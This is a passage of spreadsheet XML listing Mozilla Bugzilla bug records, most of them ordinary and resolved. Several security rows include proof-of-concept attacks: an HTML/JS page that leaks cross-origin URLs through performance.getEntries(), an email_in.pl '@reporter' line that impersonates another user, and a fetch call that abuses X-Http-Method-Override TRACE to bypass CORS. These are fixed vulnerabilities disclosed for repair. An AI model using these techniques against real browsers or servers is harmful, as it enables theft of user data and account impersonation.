      <c r="I3759" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J3759" t="inlineStr">
        <is>
          <t>Plug-ins</t>
        </is>
      </c>
      <c r="K3759" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3759" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3759" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3759" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3759" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3759" t="inlineStr"/>
      <c r="Q3759" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3759" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S3759" t="inlineStr">
        <is>
          <t>mozilla1.9alpha8</t>
        </is>
      </c>
      <c r="T3759" t="n">
        <v>1</v>
      </c>
      <c r="U3759" t="n">
        <v>0</v>
      </c>
      <c r="V3759" t="n">
        <v>21</v>
      </c>
      <c r="W3759" t="inlineStr">
        <is>
          <t>Went to view the latest "Will it Blend?" but the video is not being displayed in Minefield (see URL).  Works OK in Fx2.0.0.5.  YouTube videos and such still work fine, as well.</t>
        </is>
      </c>
      <c r="X3759" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3760">
      <c r="A3760" t="n">
        <v>1256751</v>
      </c>
      <c r="B3760" t="inlineStr">
        <is>
          <t>2016-03-15 11:15:01 -0700</t>
        </is>
      </c>
      <c r="C3760" t="inlineStr">
        <is>
          <t>Ctrl-clicking a pinned job should toggle pinning</t>
        </is>
      </c>
      <c r="D3760" t="inlineStr">
        <is>
          <t>2016-06-28 17:21:38 -0700</t>
        </is>
      </c>
      <c r="E3760" t="n">
        <v>1</v>
      </c>
      <c r="F3760" t="n">
        <v>1</v>
      </c>
      <c r="G3760" t="n">
        <v>7</v>
      </c>
      <c r="H3760" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I3760" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J3760" t="inlineStr">
        <is>
          <t>Treeherder</t>
        </is>
      </c>
      <c r="K3760" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L3760" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3760" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3760" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3760" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3760" t="inlineStr"/>
      <c r="Q3760" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3760" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3760" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3760" t="n">
        <v>1</v>
      </c>
      <c r="U3760" t="n">
        <v>0</v>
      </c>
      <c r="V3760" t="n">
        <v>4</v>
      </c>
      <c r="W3760" t="inlineStr">
        <is>
          <t>When I ctrl-click a job, it pins it, which is good. But I can't unpin jobs by ctrl-clicking them again, as I expected.</t>
        </is>
      </c>
      <c r="X3760" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3761">
      <c r="A3761" t="n">
        <v>1487964</v>
      </c>
      <c r="B3761" t="inlineStr">
        <is>
          <t>2018-08-31 22:10:12 -0700</t>
        </is>
      </c>
      <c r="C3761" t="inlineStr">
        <is>
          <t>Cross-Origin URL Steal is possible using performance.getEntries()</t>
        </is>
      </c>
      <c r="D3761" t="inlineStr">
        <is>
          <t>2024-05-30 09:48:00 -0700</t>
        </is>
      </c>
      <c r="E3761" t="n">
        <v>1</v>
      </c>
      <c r="F3761" t="n">
        <v>1</v>
      </c>
      <c r="G3761" t="n">
        <v>3</v>
      </c>
      <c r="H3761" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3761" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3761" t="inlineStr">
        <is>
          <t>DOM: Navigation</t>
        </is>
      </c>
      <c r="K3761" t="inlineStr">
        <is>
          <t>60 Branch</t>
        </is>
      </c>
      <c r="L3761" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3761" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3761" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3761" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3761" t="inlineStr">
        <is>
          <t>[necko-triaged][adv-main64+][adv-esr60.4+]</t>
        </is>
      </c>
      <c r="Q3761" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3761" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3761" t="inlineStr">
        <is>
          <t>mozilla65</t>
        </is>
      </c>
      <c r="T3761" t="n">
        <v>1</v>
      </c>
      <c r="U3761" t="n">
        <v>0</v>
      </c>
      <c r="V3761" t="n">
        <v>57</v>
      </c>
      <c r="W3761" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36
Steps to reproduce:
The fix for this issue https://bugzilla.mozilla.org/show_bug.cgi?id=1468523 has correctly addressed, we can not reproduce by changing the location using a meta-refresh.
It alerts "http://pwning.click/con.html" when we run this inside a frame, which is expected result.
Test live on: http://pwning.click/redirffeg.html
However, we can reproduce this issue by changing its location using JavaScript location property. Note that the page need to run inside a frame.
Test live on: http://pwning.click/redirffeg2.html
Proof Of Concept:
redirffeg2.html:
&lt;iframe src="http://pwning.click/ffredirtest.html"/&gt;&lt;/iframe&gt;
ffredirtest.html:
&lt;embed src="/ffloctest.html"&gt;
&lt;script&gt;
setTimeout(function(){alert(performance.getEntriesByType("resource")[1].name)},5000);
&lt;/script&gt;
&lt;b&gt;
&lt;br&gt;
&lt;br&gt;
&lt;br&gt;
Type anything into the search bar and press ENTER! 
&lt;br&gt;
&lt;br&gt;
&lt;br&gt;
Then I'll figure out your secret search!
&lt;/b&gt;
ffloctest.html:
&lt;script&gt;location="https://www.bing.com/search?q=test"&lt;/script&gt;
Tested on Firefox Nightly 63.0a1 (2018-08-31) (64-bit)
Actual results:
Mozilla Firefox allows us to access Cross-Origin URL.
Expected results:
Accessing to Cross-Origin URL should be not possible.</t>
        </is>
      </c>
      <c r="X3761" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3762">
      <c r="A3762" t="n">
        <v>1286578</v>
      </c>
      <c r="B3762" t="inlineStr">
        <is>
          <t>2016-07-13 08:41:32 -0700</t>
        </is>
      </c>
      <c r="C3762" t="inlineStr">
        <is>
          <t>Resultset is left with a push_timestamp of 0 after being updated, making it virtually hidden</t>
        </is>
      </c>
      <c r="D3762" t="inlineStr">
        <is>
          <t>2016-09-30 03:30:35 -0700</t>
        </is>
      </c>
      <c r="E3762" t="n">
        <v>1</v>
      </c>
      <c r="F3762" t="n">
        <v>1</v>
      </c>
      <c r="G3762" t="n">
        <v>7</v>
      </c>
      <c r="H3762" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I3762" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J3762" t="inlineStr">
        <is>
          <t>Treeherder: Data Ingestion</t>
        </is>
      </c>
      <c r="K3762" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L3762" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3762" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3762" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3762" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3762" t="inlineStr"/>
      <c r="Q3762" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3762" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S3762" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3762" t="n">
        <v>1</v>
      </c>
      <c r="U3762" t="n">
        <v>0</v>
      </c>
      <c r="V3762" t="n">
        <v>21</v>
      </c>
      <c r="W3762" t="inlineStr">
        <is>
          <t>I updated mozilla-central with commits from autoland and that resulted in 
https://hg.mozilla.org/mozilla-central/pushloghtml?changeset=151aaa2db94d
but treeherder don't display this push in the timeline on https://treeherder.mozilla.org/#/jobs?repo=mozilla-central as it would never happened
https://treeherder.mozilla.org/#/jobs?repo=mozilla-central&amp;revision=151aaa2db94d3fabe8958b61904371b8f415065d works but it says i pushed jan 1 at 1:00 ? 
can we look into this because i guess "missing" pushes in the timeline are bad, even when hg looks ok</t>
        </is>
      </c>
      <c r="X3762" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3763">
      <c r="A3763" t="n">
        <v>887334</v>
      </c>
      <c r="B3763" t="inlineStr">
        <is>
          <t>2013-06-26 10:00:38 -0700</t>
        </is>
      </c>
      <c r="C3763" t="inlineStr">
        <is>
          <t>GC hazard with default compartments and frame chain restoration</t>
        </is>
      </c>
      <c r="D3763" t="inlineStr">
        <is>
          <t>2014-05-05 19:07:49 -0700</t>
        </is>
      </c>
      <c r="E3763" t="n">
        <v>1</v>
      </c>
      <c r="F3763" t="n">
        <v>1</v>
      </c>
      <c r="G3763" t="n">
        <v>3</v>
      </c>
      <c r="H3763" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3763" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3763" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K3763" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3763" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3763" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3763" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3763" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3763" t="inlineStr">
        <is>
          <t>[adv-main24+] underlying cause/fix of 882897,883301 and probably 886174</t>
        </is>
      </c>
      <c r="Q3763" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3763" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3763" t="inlineStr">
        <is>
          <t>mozilla25</t>
        </is>
      </c>
      <c r="T3763" t="n">
        <v>1</v>
      </c>
      <c r="U3763" t="n">
        <v>0</v>
      </c>
      <c r="V3763" t="n">
        <v>63</v>
      </c>
      <c r="W3763" t="inlineStr">
        <is>
          <t>Default compartments make our book keeping tricky in a number of ways:
* When we're in the default compartment, enterCompartmentDepth is zero but cx-&gt;compartment() is non-null.
* The default compartment on a cx can change at any time, even when we've already got code running on that cx.
* The default compartment is actually tracked by a "default compartment object", which is the outer window in Gecko. But this object gets transplanted, so even if it stays the same, the compartment we compute from it varies with time.
Meanwhile, saveFrameChain slurps up the current compartment and enterCompartmentDepth of a cx and pushes it onto a stack, putting the cx in whatever compartment currently holds the associated default compartment object. restoreFrameChain pops the stack and resets the previous compartment and enterCompartmentDepth.
This whole setup significantly complicates our attempt to mark all the live globals in the system. Currently, we do three things:
(A) (In the JS Engine): Mark the global associated with each frame on the stack.
(B) (In the JS Engine): Iterate over all the compartments, and mark those we've called enter() on.
(C) (In XPConnect): Iterate over all the contexts, and mark the global associated with the default compartment object.
This usually works. But it breaks in the following case:
1 - cx-&gt;enterCompartmentDepth is zero, and cx is in the default compartment. There is no code running on cx.
2 - We push cx, causing us to call saveFrameChain, stashing the tuple (0, defaultCompartmentObject-&gt;compartment()) onto the SavedFrameChain stack.
3 - We either call JS_SetGlobalObject(cx, someOtherObject), or transplant defaultCompartmentObject to another compartment.
4 - We pop cx, causing us to call restoreFrameChain, setting cx-&gt;enterCompartmentDepth to 0, and putting cx in the old compartment, which is no longer equal to cx-&gt;defaultCompartmentObject-&gt;compartment().
After (3), nothing is keeping the saved compartment alive (See A-C above):
(A) No code was running in (1), we don't have any stack frames to trace.
(B) We never call enter() on default compartments.
(C) The compartment doesn't match that of the defaultCompartmentObject on the cx, so the XPConnect hook misses it.
We can keep the compartment alive between (3) and (4) by calling enter() on all the compartments we push onto the SavedFrameChain stack (luke suggested this on monday). But once (4) happens, we'd have to call leave(), and still be screwed.
I then thought that we could check in saveFrameChain whether we either (a) have manually entered the current compartment or (b) have a non-empty scope-chain in the current compartment. If we have neither of the above, we'd set the compartment of the SavedFrameChain to null, and compute the default compartment when it comes time to actually use it. But if (b) is the case, then we're still in trouble, because as soon as the associated code is finished running, the cx will remain in that compartment, but we'll have no way to mark it (since none of A-C will apply once the last stack frame is popped).
In general, the solution here is to rip out default compartment objects, and I have a plan to do that. But I'd like to find a well-contained fix here that we can backport. Thoughts, luke?</t>
        </is>
      </c>
      <c r="X3763" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3764">
      <c r="A3764" t="n">
        <v>1659155</v>
      </c>
      <c r="B3764" t="inlineStr">
        <is>
          <t>2020-08-14 10:04:27 -0700</t>
        </is>
      </c>
      <c r="C3764" t="inlineStr">
        <is>
          <t>contextMenus.onClicked: info.srcUrl is the final URL (after redirects) instead of the &lt;img src&gt; value.</t>
        </is>
      </c>
      <c r="D3764" t="inlineStr">
        <is>
          <t>2022-08-26 23:17:44 -0700</t>
        </is>
      </c>
      <c r="E3764" t="n">
        <v>1</v>
      </c>
      <c r="F3764" t="n">
        <v>1</v>
      </c>
      <c r="G3764" t="n">
        <v>3</v>
      </c>
      <c r="H3764" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3764" t="inlineStr">
        <is>
          <t>WebExtensions</t>
        </is>
      </c>
      <c r="J3764" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3764" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3764" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3764" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3764" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3764" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3764" t="inlineStr">
        <is>
          <t>[addons-jira][adv-main94+]</t>
        </is>
      </c>
      <c r="Q3764" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3764" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S3764" t="inlineStr">
        <is>
          <t>95 Branch</t>
        </is>
      </c>
      <c r="T3764" t="n">
        <v>1</v>
      </c>
      <c r="U3764" t="n">
        <v>0</v>
      </c>
      <c r="V3764" t="n">
        <v>25</v>
      </c>
      <c r="W3764" t="inlineStr">
        <is>
          <t>Created attachment 9170075
menus-srcUrl-redirect.zip
Since bug 1406253, the `info.srcUrl` field of the `contextMenus.onClicked` event returns the URL after redirects, instead of the URL of the image request.
Prior to that bug, and also in Chrome, the `info.srcUrl` field was the image's src element.
STR:
1. Load attached extension, which opens a tab with an image.
2. Right-click on the image and click on the extension's context menu.
Expected (Chrome 84):
- A dialog with a URL ending with "before-redirect".
Actual (Firefox 81):
- A dialog with a URL ending with "after-redirect"
I'm inclined to resolve the bug as follows:
- ~Update MDN to clarify that `info.srcUrl` may differ from the `&lt;img&gt;`'s src attribute. In Chrome, this is always the URL of the initial request. In Firefox, this is the final URL (after any redirects).~ EDIT: The alternative is preferred, see comment 2 and comment 3.
- Add a unit test to make sure that the behavior continues to be as documented.
The alternative is to let `info.srcUrl` be the initial URL again. This would result in consistent behavior between Firefox and Chrome. I guess that few users cared either way, since nobody has filed a bug about this (I only discovered this when I [investigated a report about DownThemAll not working on Twitter](https://bugzilla.mozilla.org/show_bug.cgi?id=1621249#c4)).
Some extensions ([including DownThemAll](https://github.com/downthemall/downthemall/blob/858b8f277e8f9c0a080193916c6f01c73aa437a0/lib/background.ts#L505-L531)) use `info.srcUrl` to identify the element to which the context menu is anchored from a content script. Since there is a superior alternative (`info.targetElementId` + [`browser.menus.getTargetElement`](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/menus/getTargetElement)), I would recommend extension authors to use that API to really identify the target element without having to traverse the whole DOM to find the image element of interest.</t>
        </is>
      </c>
      <c r="X3764" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3765">
      <c r="A3765" t="n">
        <v>419188</v>
      </c>
      <c r="B3765" t="inlineStr">
        <is>
          <t>2008-02-23 08:27:00 -0800</t>
        </is>
      </c>
      <c r="C3765" t="inlineStr">
        <is>
          <t>[SECURITY] email_in.pl lets you set the changer as @reporter instead of only checking the "From" header</t>
        </is>
      </c>
      <c r="D3765" t="inlineStr">
        <is>
          <t>2008-05-05 14:47:57 -0700</t>
        </is>
      </c>
      <c r="E3765" t="n">
        <v>1</v>
      </c>
      <c r="F3765" t="n">
        <v>1</v>
      </c>
      <c r="G3765" t="n">
        <v>4</v>
      </c>
      <c r="H3765" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I3765" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J3765" t="inlineStr">
        <is>
          <t>Incoming Email</t>
        </is>
      </c>
      <c r="K3765" t="inlineStr">
        <is>
          <t>2.23.4</t>
        </is>
      </c>
      <c r="L3765" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3765" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3765" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3765" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3765" t="inlineStr">
        <is>
          <t>[ready for 3.x]</t>
        </is>
      </c>
      <c r="Q3765" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3765" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S3765" t="inlineStr">
        <is>
          <t>Bugzilla 3.0</t>
        </is>
      </c>
      <c r="T3765" t="n">
        <v>1</v>
      </c>
      <c r="U3765" t="n">
        <v>0</v>
      </c>
      <c r="V3765" t="n">
        <v>13</v>
      </c>
      <c r="W3765" t="inlineStr">
        <is>
          <t>email_in.pl lets you do changes even without altering the email headers. This means that even if you use PGP to sign your emails, or use tokens, it's still trivial to alter bugs as if you were someone else. One useful case would be the ability to CC yourself to bugs you want to see. All you have to do is to add the following line to your email:
@reporter = someone.else@user.account
Where the email address is a valid user account with privs to access security bugs. This trick works with process_bug.cgi, i.e. with existing bugs, which is why I restricted this bug to the security group.
I know email_in.pl currently has no way to check the real identity of the sender, but for installations which added some checks to it and turned on incoming emails, they are still fully vulnerable (e.g. Mandriva Bugzilla).
Now technically, the reason this works is because we have:
    my $username = $mail_fields-&gt;{'reporter'};
    my $user = Bugzilla::User-&gt;new({ name =&gt; $username })
      || ThrowUserError('invalid_username', { name =&gt; $username });
    Bugzilla-&gt;set_user($user);
But $mail_fields-&gt;{'reporter'} comes from:
    my ($reporter) = Email::Address-&gt;parse($input_email-&gt;header('From'));
    $fields{'reporter'} = $reporter-&gt;address;
The problem is that later in the code, we have:
    if ($line =~ /^@(\S+)\s*=\s*(.*)\s*/) {
        $current_field = lc($1);
        $fields{$current_field} = $2;
    }
So if you have the @reporter line, it will override the one taken from the email header, and so all authenticated emails are vulnerable.
I just tried this trick to CC myself to a bug I'm not allowed to see on a test installation, and this works great. I could do the same on Mandriva!</t>
        </is>
      </c>
      <c r="X3765" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3766">
      <c r="A3766" t="n">
        <v>1790311</v>
      </c>
      <c r="B3766" t="inlineStr">
        <is>
          <t>2022-09-11 22:08:52 -0700</t>
        </is>
      </c>
      <c r="C3766" t="inlineStr">
        <is>
          <t>Generic CORS bypass that enables Cross-Site-Tracing (XST)</t>
        </is>
      </c>
      <c r="D3766" t="inlineStr">
        <is>
          <t>2024-05-30 11:00:20 -0700</t>
        </is>
      </c>
      <c r="E3766" t="n">
        <v>1</v>
      </c>
      <c r="F3766" t="n">
        <v>1</v>
      </c>
      <c r="G3766" t="n">
        <v>3</v>
      </c>
      <c r="H3766" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3766" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3766" t="inlineStr">
        <is>
          <t>DOM: Networking</t>
        </is>
      </c>
      <c r="K3766" t="inlineStr">
        <is>
          <t>Firefox 104</t>
        </is>
      </c>
      <c r="L3766" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3766" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3766" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3766" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3766" t="inlineStr">
        <is>
          <t>[necko-triaged][post-critsmash-triage][adv-main107+][adv-esr102.5+]</t>
        </is>
      </c>
      <c r="Q3766" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3766" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S3766" t="inlineStr">
        <is>
          <t>108 Branch</t>
        </is>
      </c>
      <c r="T3766" t="n">
        <v>1</v>
      </c>
      <c r="U3766" t="n">
        <v>0</v>
      </c>
      <c r="V3766" t="n">
        <v>46</v>
      </c>
      <c r="W3766" t="inlineStr">
        <is>
          <t>Steps to reproduce:
Cross Site Tracing (XST) used to be an effective way to bypass local controls and gain access to authorization headers and cookies protected by httponly attributes. However, for many years the main browsers have implemented limits on fetch and XMLHttpRequest that stop the direct use of the TRACE method.
Out in the real world, some servers that implement CORS simply echo back the contents of the Access-Control-Request-Headers request header in the Access-Control-Allow-Headers response header. This means that it is possible to add an X-Http-Method-Override: TRACE header, which will bypass CORS protections.
The result being that if certain conditions are met (a server has lax CORS, implements the TRACE method and the X-Http-Method-Override header), then fetch and XMLHttpRequest can still be used to bypass CORS and deliver an XST attack.
This will allow any functional XSS on the site to gain access to authorization headers and cookies protected by httponly attributes.
An example of a server with CORS that echos back the Access-Control-Request-Headers header:
fetch( 'https://realtime.www.linkedin.com/realtime/connect', {
   method: 'GET',
   mode: 'cors',
   headers: {
      'x-http-method-override': 'TRACE'
   }
} );
Actual results:
The combination of issues allows an XST attack to be delivered.
Expected results:
The TRACE method should be blocked in requests from fetch and XMLHttpRequest, whether it is in the main method parameter, or in common override headers ( 'x-http-method-override, x-http-method, x-http-override )</t>
        </is>
      </c>
      <c r="X3766" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3767">
      <c r="A3767" t="n">
        <v>410156</v>
      </c>
      <c r="B3767" t="inlineStr">
        <is>
          <t>2007-12-29 03:27:16 -0800</t>
        </is>
      </c>
      <c r="C3767" t="inlineStr">
        <is>
          <t>URL files (IE bookmarks) cause remote code to run as local file when opened directly</t>
        </is>
      </c>
      <c r="D3767" t="inlineStr">
        <is>
          <t>2017-03-10 04:51:52 -0800</t>
        </is>
      </c>
      <c r="E3767" t="n">
        <v>1</v>
      </c>
      <c r="F3767" t="n">
        <v>1</v>
      </c>
      <c r="G3767" t="n">
        <v>2</v>
      </c>
      <c r="H3767" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I3767" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J3767" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K3767" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3767" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3767" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N3767" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3767" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3767" t="inlineStr">
        <is>
          <t>[sg:moderate]</t>
        </is>
      </c>
      <c r="Q3767" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3767" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3767" t="inlineStr">
        <is>
          <t>Firefox 3</t>
        </is>
      </c>
      <c r="T3767" t="n">
        <v>1</v>
      </c>
      <c r="U3767" t="n">
        <v>0</v>
      </c>
      <c r="V3767" t="n">
        <v>33</v>
      </c>
      <c r="W3767" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9b3pre) Gecko/2007122805 Minefield/3.0b3pre
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9b3pre) Gecko/2007122805 Minefield/3.0b3pre
I added Firefox to my Send To: menu to allow me to open local HTML and URL files in Firefox because these extensions are associated with my editors.
I opened a URL file from my IE favorites folder this way (equivalent of dragging it onto the Firefox executable) and lo and behold, the page loaded as a file: protocol page but then went on to download the HTML from the remote server! This should cause a redirect to the URL embedded in the file rather than running it as a local file containing 100% remote code. I'm sure there's &gt; 20 exploits that could be done after this stage has been reached, including spidering the HD through an iframe and sending the data back via dynamic script tag with relative URL added to the page's code.
Reproducible: Always
Steps to Reproduce:
1. Add Firefox to Send To menu
2. Send it a URL file
Actual Results:  
Remote code loaded under the file: protocol
Expected Results:  
Remote page URL in the address bar, then page load.</t>
        </is>
      </c>
      <c r="X3767" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3768">
      <c r="A3768" t="n">
        <v>1247968</v>
      </c>
      <c r="B3768" t="inlineStr">
        <is>
          <t>2016-02-12 08:26:31 -0800</t>
        </is>
      </c>
      <c r="C3768" t="inlineStr">
        <is>
          <t>Full URL spoof using javascript URI scheme</t>
        </is>
      </c>
      <c r="D3768" t="inlineStr">
        <is>
          <t>2024-05-30 09:09:32 -0700</t>
        </is>
      </c>
      <c r="E3768" t="n">
        <v>1</v>
      </c>
      <c r="F3768" t="n">
        <v>1</v>
      </c>
      <c r="G3768" t="n">
        <v>3</v>
      </c>
      <c r="H3768" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3768" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3768" t="inlineStr">
        <is>
          <t>DOM: Navigation</t>
        </is>
      </c>
      <c r="K3768" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3768" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3768" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3768" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3768" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3768" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main74+]</t>
        </is>
      </c>
      <c r="Q3768" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3768" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3768" t="inlineStr">
        <is>
          <t>mozilla74</t>
        </is>
      </c>
      <c r="T3768" t="n">
        <v>1</v>
      </c>
      <c r="U3768" t="n">
        <v>0</v>
      </c>
      <c r="V3768" t="n">
        <v>32</v>
      </c>
      <c r="W3768" t="inlineStr">
        <is>
          <t>Created attachment 8718878
FF-URL-SPOOFv2.html
+++ This bug was initially created as a clone of Bug #1228754 +++
(original test and steps from bug 1228754 and @qab, not from me)
1. Open attached file.
2. click link
3. click back button in the browser
Somehow, the URL stays in the URL bar. Interrogating the browser's currentURI shows the URL shown in the URL bar, but the document displayed is actually about:blank (and the documentURI and so on verify this, and document.documentElement.nodePrincipal is the original opener's principal (localhost if you host the file there, bugzilla if you opened it directly ).
(In reply to Boris Zbarsky [:bz] from bug 1228754 comment #33)
&gt; Sounds like it, but it also sounds like something different from the
&gt; original issue reported in this bug (the one I analyzed in comment 6). 
&gt; Seems like we should get a new bug filed on the interaction involving
&gt; session history, and probably ask Olli whether he can take a look.
--&gt; ni Olli.</t>
        </is>
      </c>
      <c r="X3768" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3769">
      <c r="A3769" t="n">
        <v>932162</v>
      </c>
      <c r="B3769" t="inlineStr">
        <is>
          <t>2013-10-28 21:32:11 -0700</t>
        </is>
      </c>
      <c r="C3769" t="inlineStr">
        <is>
          <t>Crash in mozilla::dom::indexedDB::IndexedDatabaseManager::AddRef invoked by mozilla::dom::indexedDB::FileInfo::Cleanup in cycle collecting DOM Worker death</t>
        </is>
      </c>
      <c r="D3769" t="inlineStr">
        <is>
          <t>2015-02-25 20:47:26 -0800</t>
        </is>
      </c>
      <c r="E3769" t="n">
        <v>1</v>
      </c>
      <c r="F3769" t="n">
        <v>1</v>
      </c>
      <c r="G3769" t="n">
        <v>3</v>
      </c>
      <c r="H3769" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3769" t="inlineStr">
